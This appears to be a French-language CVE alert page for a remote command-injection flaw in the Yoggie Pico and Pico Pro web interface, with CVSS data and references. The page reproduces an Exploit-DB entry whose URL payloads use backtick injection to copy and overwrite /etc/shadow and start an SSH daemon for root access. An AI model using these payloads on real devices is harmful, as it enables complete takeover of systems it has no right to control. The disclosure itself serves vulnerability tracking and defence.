Alerte pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Descriptions
Incomplete blacklist vulnerability in cgi-bin/runDiagnostics.cgi in the web interface on the Yoggie Pico and Pico Pro allows remote attackers to execute arbitrary commands via shell metacharacters in the param parameter, as demonstrated by URL encoded "`" (backtick) characters (%60 sequences).
Informations
Metrics
| Metric | Score | Sévérité | CVSS Vecteur | Source |
|---|---|---|---|---|
| V2 | 9.3 | AV:N/AC:M/Au:N/C:C/I:C/A:C | nvd@nist.gov |
EPSS
EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.
EPSS Score
Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.
EPSS Percentile
Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
Informations sur l'Exploit
Exploit Database EDB-ID : 30260
Date de publication : 2007-07-01 22:00 +00:00
Auteur : Cody Brocious
EDB Vérifié : Yes
source: https://www.securityfocus.com/bid/24743/info
Yoggie Pico and Pico Pro are prone to a remote code-execution vulnerability because the device fails to sufficiently sanitize user-supplied input.
An attacker can exploit this issue to execute arbitrary code with superuser privileges. A successful exploit will result in the complete compromise of affected devices.
When run from a machine with a Yoggie Pico Pro connected,
yoggie.yoggie.com resolves to the IP of the device, so these links
will of course not work unless you have a device connected. I didn't
brute-force the root password, so I explain how you can replace their
/etc/shadow to set the password to whatever you choose.
To access the original /etc/shadow:
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60cp%20/etc/shadow%20shadow.txt%60
https://yoggie.yoggie.com:8443/cgi-bin/shadow.txt
Replace the root password with the password of your choosing, then
wrap the file in single quotes and urlencode the entire string.
To replace the original /etc/shadow with your own:
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60echo%20%20%3E%20/etc/shadow%60
Finally, running dropbear sshd on port 7290 (random choice -- not
blocked by their firewall rules)
https://yoggie.yoggie.com:8443/cgi-bin/runDiagnostics.cgi?command=Ping¶m=%60/usr/sbin/dropbear%20-p%207290%60
Log in as root with the password chosen, and you now have complete
control over the device. It's quite powerful little computer, and a
whole hell of a lot of fun to play around with. A word of advice,
though -- don't touch libc in any way, shape, or form, as there's no
reflash mechanism I've found on the device, which is why I now have a
bricked pico pro sitting on my desk ;)
Products Mentioned
Configuraton 0
Yoggie>>Pico >> Version *
Yoggie>>Pico_pro >> Version *
References
http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0020.html
Tags : mailing-list, x_refsource_FULLDISC
Tags : mailing-list, x_refsource_FULLDISC
http://archives.neohapsis.com/archives/fulldisclosure/2007-07/0092.html
Tags : mailing-list, x_refsource_FULLDISC
Tags : mailing-list, x_refsource_FULLDISC
2024©
tesweb SA
